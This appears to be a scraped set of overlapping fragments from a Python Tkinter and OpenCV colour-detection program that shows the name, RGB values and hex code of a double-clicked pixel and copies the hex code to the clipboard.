"url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() #",
"img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\")",
"clicked=False #Break the loop when User hits 'enter' key if cv2.waitKey(20) & 0xFF",
"x,y coordinates of mouse double click def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK:",
"R='+ str(r) + ' G='+ str(g) + ' B='+ str(b) +\" \"+ getColorName.hexcode",
"# open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized",
"ImageTk,Image import pyperclip as pc root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53')",
"csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y coordinates of mouse double click",
"False r = g = b = hexcode = xpos = ypos =",
"files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) # open select2 btn image selectimg2",
"root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path =",
"xpos = x ypos = y b,g,r = img[y,x] b = int(b) g",
"= int(b) g = int(g) r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color",
"finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl =",
"string to display( Color name and RGB values ) text = getColorName.cname +",
"= urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn",
"= \"\" def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\",",
"Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command",
"of mouse double click def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos,",
"= img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For",
"y b,g,r = img[y,x] b = int(b) g = int(g) r = int(r)",
"img = urlimg.image else : #Reading the image with opencv img = cv2.imread(image_path)",
"get the most matching color def getColorName(R,G,B): minimum = 10000 for i in",
"open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 =",
"= urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg",
"= urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable =",
"ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img = urlimg.image else",
"print(image_path) # open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image",
"if (clicked): #scale text according to image size imageWidth = img.shape[0] imageHeight =",
"getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode) #scale text according to image size",
"import cv2 import numpy as np import urllib.request import pandas as pd from",
"filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) # open select2 btn image",
"= Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\")",
"True xpos = x ypos = y b,g,r = img[y,x] b = int(b)",
"x ypos = y b,g,r = img[y,x] b = int(b) g = int(g)",
"start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS)",
"coordinates of mouse double click def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global",
"#scale text according to image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale",
"openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img",
"#resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return",
"b = hexcode = xpos = ypos = 0 #Reading csv file with",
"tkinter import filedialog from PIL import ImageTk,Image import pyperclip as pc root =",
"= hexcode = xpos = ypos = 0 #Reading csv file with pandas",
"# open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2",
"abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function",
"Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize",
"= cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\")",
"root.configure(bg='#243B53') image_path = \"\" def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an",
"= img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire rectangle",
"files\",\"*.png\"))) image_path = root.filename print(image_path) # open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp",
"most matching color def getColorName(R,G,B): minimum = 10000 for i in range(len(csv)): d",
"getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y coordinates of mouse",
"to clipboard pc.copy(getColorName.hexcode) #scale text according to image size imageWidth = img.shape[0] imageHeight",
"imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color,",
"clicked = False r = g = b = hexcode = xpos =",
"= b = hexcode = xpos = ypos = 0 #Reading csv file",
"later on) clicked = False r = g = b = hexcode =",
"url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn",
"import * import cv2 import numpy as np import urllib.request import pandas as",
"Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text according to image size",
"np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn image urllabel",
"(are used later on) clicked = False r = g = b =",
"double click def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked",
"import pandas as pd from tkinter import filedialog from PIL import ImageTk,Image import",
"return image_path image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array =",
"names=index, header=None) #function to calculate minimum distance from all colors and get the",
"ypos = 0 #Reading csv file with pandas and giving names to each",
"urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel",
"all colors and get the most matching color def getColorName(R,G,B): minimum = 10000",
"an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) # open",
"root.destroy() # open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image",
"abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode =",
"#Creating text string to display( Color name and RGB values ) text =",
"#resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260)",
"x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True xpos =",
"Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text according",
"select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS)",
"light colours we will display text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False",
"pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root,",
"finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img =",
"= root.filename print(image_path) # open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize",
": #Reading the image with opencv img = cv2.imread(image_path) #declaring global variables (are",
"min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will display text",
"= image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\")",
"as pc root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\"",
"pandas and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index,",
"to image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image,",
"file with pandas and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp",
"= xpos = ypos = 0 #Reading csv file with pandas and giving",
"== \"\": img = urlimg.image else : #Reading the image with opencv img",
"cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text according to",
"#function to get x,y coordinates of mouse double click def draw_function(event, x,y,flags,param): if",
"black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User hits 'enter'",
"G='+ str(g) + ' B='+ str(b) +\" \"+ getColorName.hexcode #copying color code to",
"open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 =",
"' G='+ str(g) + ' B='+ str(b) +\" \"+ getColorName.hexcode #copying color code",
"= urlimg.image else : #Reading the image with opencv img = cv2.imread(image_path) #declaring",
"Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn",
"urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4)",
"int(g) r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color",
"= pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum distance from all colors",
"display( Color name and RGB values ) text = getColorName.cname + ' R='+",
"g = int(g) r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1):",
"xpos = ypos = 0 #Reading csv file with pandas and giving names",
"= True xpos = x ypos = y b,g,r = img[y,x] b =",
"d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d",
"* import cv2 import numpy as np import urllib.request import pandas as pd",
"opencv img = cv2.imread(image_path) #declaring global variables (are used later on) clicked =",
"ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp",
"' B='+ str(b) +\" \"+ getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode) #scale",
"def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True",
"pc root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def",
"size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint,",
"the most matching color def getColorName(R,G,B): minimum = 10000 for i in range(len(csv)):",
"= x ypos = y b,g,r = img[y,x] b = int(b) g =",
"img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we",
"image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open",
"in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User hits",
"= ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image openimg =",
"image_path image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()),",
"tkinter import * import cv2 import numpy as np import urllib.request import pandas",
"resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def",
"minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y",
"import numpy as np import urllib.request import pandas as pd from tkinter import",
"image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 =",
"= ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl = image_url.get()",
"\"\": img = urlimg.image else : #Reading the image with opencv img =",
"cv2 import numpy as np import urllib.request import pandas as pd from tkinter",
"cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will display text in black colour",
"ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp",
"#function to calculate minimum distance from all colors and get the most matching",
"= Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open(): global",
"clipboard pc.copy(getColorName.hexcode) #scale text according to image size imageWidth = img.shape[0] imageHeight =",
"range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum =",
"#resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150)",
"image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 =",
"image_url.set(\"\") root.destroy() # open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn",
"= min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r),",
"numpy as np import urllib.request import pandas as pd from tkinter import filedialog",
"filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path)",
"image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image",
"if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get",
"import pyperclip as pc root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path",
"to get x,y coordinates of mouse double click def draw_function(event, x,y,flags,param): if event",
"image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8)",
"csv.loc[i,\"hex\"] #function to get x,y coordinates of mouse double click def draw_function(event, x,y,flags,param):",
"img[y,x] b = int(b) g = int(g) r = int(r) cv2.namedWindow('Image Color Detection')",
"text string to display( Color name and RGB values ) text = getColorName.cname",
"image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 =",
"image_path = root.filename print(image_path) # open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\")",
"startpoint, endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating",
"img = cv2.imread(image_path) #declaring global variables (are used later on) clicked = False",
"image with opencv img = cv2.imread(image_path) #declaring global variables (are used later on)",
"= ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img = urlimg.image",
"btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) #",
"r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img)",
"+ abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode",
"(b,g,r), -1) getColorName(r,g,b) #Creating text string to display( Color name and RGB values",
"\"+ getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode) #scale text according to image",
"else : #Reading the image with opencv img = cv2.imread(image_path) #declaring global variables",
"= Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize",
"each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum",
"dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn image urllabel =",
"header=None) #function to calculate minimum distance from all colors and get the most",
"urllib.request import pandas as pd from tkinter import filedialog from PIL import ImageTk,Image",
"image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar()",
"img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very",
"image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image",
"urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3)",
"int(b) g = int(g) r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function)",
"open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 =",
"the loop when User hits 'enter' key if cv2.waitKey(20) & 0xFF ==13: break",
"= ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen =",
"get x,y coordinates of mouse double click def draw_function(event, x,y,flags,param): if event ==",
"text according to image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale =",
"pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum distance from all colors and",
"10000 for i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B-",
"int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"]",
"img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp",
"#cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b)",
"str(g) + ' B='+ str(b) +\" \"+ getColorName.hexcode #copying color code to clipboard",
"(clicked): #scale text according to image size imageWidth = img.shape[0] imageHeight = img.shape[1]",
"= selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn",
"pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155)",
"imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA)",
"= np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn image",
"= int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if",
"Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open(): global image_path",
"= ypos = 0 #Reading csv file with pandas and giving names to",
"matching color def getColorName(R,G,B): minimum = 10000 for i in range(len(csv)): d =",
"\"\" def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All",
"image_path = \"\" def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image",
"imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light",
"values ) text = getColorName.cname + ' R='+ str(r) + ' G='+ str(g)",
"= selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg():",
"to calculate minimum distance from all colors and get the most matching color",
"with pandas and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv',",
"csv file with pandas and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv =",
"name and RGB values ) text = getColorName.cname + ' R='+ str(r) +",
"filedialog from PIL import ImageTk,Image import pyperclip as pc root = Tk() root.title(\"Image",
"color code to clipboard pc.copy(getColorName.hexcode) #scale text according to image size imageWidth =",
"for i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"]))",
"my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response =",
"fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will",
"pc.copy(getColorName.hexcode) #scale text according to image size imageWidth = img.shape[0] imageHeight = img.shape[1]",
"cv2.imread(image_path) #declaring global variables (are used later on) clicked = False r =",
"event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True xpos = x ypos",
"Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2",
"b,g,r,xpos,ypos, clicked clicked = True xpos = x ypos = y b,g,r =",
"Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp",
"urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS)",
"r = g = b = hexcode = xpos = ypos = 0",
"#For very light colours we will display text in black colour if(r+g+b>=600): cv2.putText(img,",
"-1) getColorName(r,g,b) #Creating text string to display( Color name and RGB values )",
"b,g,r = img[y,x] b = int(b) g = int(g) r = int(r) cv2.namedWindow('Image",
"hexcode = xpos = ypos = 0 #Reading csv file with pandas and",
"image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy()",
"with opencv img = cv2.imread(image_path) #declaring global variables (are used later on) clicked",
